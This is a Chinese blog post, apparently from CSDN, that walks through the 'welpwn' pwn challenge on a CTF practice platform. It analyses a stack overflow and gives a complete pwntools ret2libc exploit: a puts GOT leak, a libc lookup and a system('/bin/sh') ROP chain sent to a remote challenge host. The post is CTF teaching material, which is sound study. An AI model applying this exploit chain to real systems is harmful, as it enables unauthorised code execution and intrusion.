攻防世界welpwn

最新推荐文章于 2023-10-30 09:42:50 发布
最新推荐文章于 2023-10-30 09:42:50 发布
阅读量197 收藏
点赞数
分类专栏: pwn题 文章标签: 网络 安全 系统安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56777139/article/details/129306116
版权

checksec查看

在这里插入图片描述

ida

main函数
在这里插入图片描述
点开echo函数
在这里插入图片描述
可以看到此处有一个模拟字符串复制函数,并未检查缓冲群长度,存在溢出漏洞

分析

初始的想法是利用上述漏洞,构造exp,用puts函数泄露got,但是函数当中,遇到字符\x00便会停止复制,地址当中也肯定会有\x00,所以只能注入一个返回地址。
那么我们注入什么地址呢,首先观察此时栈结构
在这里插入图片描述

若返回地址代码能连续pop四次的话,刚好能达到截断后的数据
那么构造如下payload:b’a’*16+b’a’*8+pop_4+pop_rdi+puts_got+put_plt+main_addr
被截断后在栈中的结构如下
在这里插入图片描述

连续pop可使ip指向自己构造的ROP链条
在这里插入图片描述
ROPgadget一下,发现0x40089c挺适合作为pop_4

p.recvuntil('RCTF\n')
payload=b'a'*0x18+p64(pop_4)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendline(payload)

发送之后,由于printf遇到\x00才会停止输出,就会收到’a’*ox18,以及pop_4末三位非零地址形成的字符
在此之后,则会收到puts泄露的got表

p.recvuntil(b'a'*0x18)
p.recv(3)
puts_addr=u64(p.recv(6).ljust(8,b'\x00'))

有了got表中地址,就可以利用LibcSearcher找到system与/bin/sh的地址

libc = LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump('puts')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')

进入main函数,再一次利用上述漏洞,即可成功

payload=b'a'*0x18+p64(0x40089c)+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.sendline(payload)
p.interactive()

exp

from pwn import *
from LibcSearcher import *

pwn=ELF('./pwn')
p=remote('61.147.171.105',63314)
puts_got=pwn.got['puts']
puts_plt=pwn.plt['puts']
pop_rdi=0x4008a3
pop_4=0x40089c
main_addr=0x4007cd

p.recvuntil('RCTF\n')
payload=b'a'*0x18+p64(pop_4)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendline(payload)
p.recvuntil(b'a'*0x18)
p.recv(3)
puts_addr=u64(p.recv(6).ljust(8,b'\x00'))

libc = LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump('puts')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')

payload=b'a'*0x18+p64(0x40089c)+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.sendline(payload)
p.interactive()

我有一点奇怪的地方,第一次利用漏洞之后,返回主函数,那应该会有write(1, “Welcome to RCTF\n”, 0x10uLL);语句,但是我无论在LibcSearcher部分的前面还是后面加上p.recvuntil(‘RCTF\n’)语句,都无法运行成功,把这句话去掉就能运行成功。返回主函数后,不应该会打印这句话吗,为什么接收不到呢

Zzzzzz!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界】Web warmup
DG_s1mple
01-02 820
这一题主要是利用了include的特性如果include的文件名中含有“/”,那么它会识别其为一个带目录的文件,只有最后一个“/”后的字符串对应的文件会被包含,而前面的字符串都只是在指定目录意思是,如果我们的payload是这样的对于include来说,就只会识别"/"后面的内容,变成了解了这个特性之后,我们就可以开始做题了。
攻防世界-web-warmup
wuh2333的博客
05-24 358
攻防世界,warmup
攻防世界高手进阶区 ——Welpwn
weixin_62675330的博客
03-21 853
攻防世界高手进阶区 ——Welpwn 分析文件 checksec分析 coke@ubuntu:~/桌面/CTFworkstation/OADW/welpwn$ checksec welpwn [*] '/home/coke/桌面/CTFworkstation/OADW/welpwn/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX e
攻防世界Web高手进阶区WP(1-4)
00勇士王子的博客
07-24 508
1.baby_web 题目描述中提到初始页面,一般都是 index.php 进入题目环境,可以看到是1.php 将1.php改成inex.php,然后发现页面直接跳转到1.php了 那就F12查看网页响应情况,再次访问index.php,然后发现确实访问index.php了,在返回的响应头中发现flag。 flag{very_baby_web} 2.Training-WWW-Robots 打开题目环境,一堆英文,看不懂 翻译一下 和之前新手练习区第二题一样,考察robots协议,直接访问 i
攻防世界-web】simple_php
最新发布
weixin_73625393的博客
10-30 151
也可以先求a,出flag1,再求b,出flag2,将1和2合并到一起就是flag值。b的条件是不能为纯数字,否则退出,但b要大于1234,才能获得flag2。a的条件是等于0且为真,也就是用英文字母代替,才能获取flag1。在页面url后输入/index.php查看,发现并没有内容,再往下看,这里定义了两个变量a和b。
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Check杂项
11-20
攻防世界Check杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952250
网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议】
等风来
05-22 9670
是 PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
【web | CTF】攻防世界 wife_wife
weixin_46301214的博客
06-06 4677
我暂时没搞明白这题目意义何在,好像跟实战有点偏离的太远了,用JavaScript服务器来处理登录?账号密码不存放数据库?存缓存里?能让所有人注册管理员账号?太扯淡了。
【愚公系列】2023年06月 攻防世界-Web(wife_wife)
时光隧道
06-13 4806
JavaScript原型链污染是一种黑客攻击方式,利用JavaScript中的原型继承链来污染一个对象的原型继承链,从而影响整个应用程序的执行逻辑。攻击者会利用一些漏洞或者不恰当的代码实现,将恶意代码注入到原型对象中,然后通过继承链的方式将恶意代码传递给整个应用程序。攻击者通常将恶意代码注入到全局对象或者重要对象的原型中,例如等,从而污染整个应用程序。jQuery Prototype Pollution漏洞:攻击者通过修改jQuery的方法来污染,使得在后续的代码中,可以在任何位置调用。
WEB:Wife_wife
32bin的博客
03-22 2659
get flag参考:https://www.rstk.cn/news/25963.html?
攻防世界 Pwn welpwn
MrTreebook的博客
12-25 2506
攻防世界 Pwn welpwn1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 没有canary 没有PIE 3.IDA分析 main函数中有一个可以输入的地方,但是不能溢出 接着往下看 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到一个特殊的gadget,它就是破题的关键 我们
DOSBOX中debug常用指令的使用
热门推荐
weixin_47586883的博客
10-22 1万+
仅作为个人学习笔记 挂在文件这些操作就不说了吧,一张图就够了 进入虚拟c盘,输入debug。 接下来先了解一下常用的一些debug中的命令。(命令不区分大小写) 一、查看、修改CPU中寄存器的内容:R命令。 1.直接输入r,查看寄存器中的内容: 2.改变寄存器中的内容: 可以观察到ax中的内容由0000改变成了ab23。 二、查看内存中的内容:D命令。 1.直接输入d,可以查看预设地址内存处的128个字节的内容: 输入r查看的内容中最下面一行就是当前所在的地址,即073f:0100,再输入d查看的就
攻防世界)(pwn)welpwn
PLpa的博客
07-18 2694
首先,放在最前面:这题服务器远端的libc版本是libc-2.23.so而不是libc-2.19.so的版本(害得我编译半天出不来) 看到题目,我们下载附件,一看是个tar.gz文件,我们解压一下,发现里面有三个文件: 我就心想,这个攻防世界怎么就这么好心这次,以前要给的时候从来不给,这次这么大方???答案是大错特错,这就是个骗局,这个反而是个障碍,版本根本就是错的(但仔细一想,有可能是出题者故...
welpwn RCTF-2015 攻防世界
qq_41071646的博客
06-03 1637
参考链接 http://www.purpleroc.com/md/2015-11-17@RCTF-Writeup.html 这个题只是没有想到 找到这个点 然后 攻防世界 给的 so库也有问题 感觉 攻防世界的so环境都是 2.23的鸭 然后我就没有用DynELF 其实 可以在服务器看一下 地址 然后根据 后三位来判断是那个 只不过没有 DynELF 方便 思路就是 构造一个 ...
攻防世界 welpwn WP
Zarcs_233的博客
01-29 920
这道题出的确实很wel 拿到这题,查看保护 发现shellcode走不通,一般都是走rop路线 IDA打开,分析代码,发现main函数内调用了echo函数 这里的buf有0x400大,但是main不存在栈溢出,继续点开echo 这里我们发现有一个赋值的过程,但是a1也就是buff有0x400,而s2只有0x10字节。 很明显,复制过程中存在栈溢出,但是我一开始没发现这一点,那就是这个赋值的终止...
攻防世界 easyphp
09-11
EasyPHP是一个用于Windows操作系统的开发环境,它集成了Apache服务器、MySQL数据库和PHP解释器,使得搭建和管理网站变得更加简单。在EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞、密码学等。参与者需要通过解决这些挑战来学习和提高自己的网络安全技能。同时,攻防世界也提供了一些教程和文章,帮助新手入门并引导他们深入理解攻击和防御的原理。 对于初学者来说,攻防世界的easyphp环境可以作为一个很好的起点,因为它提供了一个集成的开发环境,使得学习和实践变得更加方便。通过解决平台上的题目和挑战,初学者可以逐渐熟悉常见的安全漏洞和攻击技术,并学会如何进行相应的防御措施。 希望以上信息对你有所帮助!如果你有任何其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值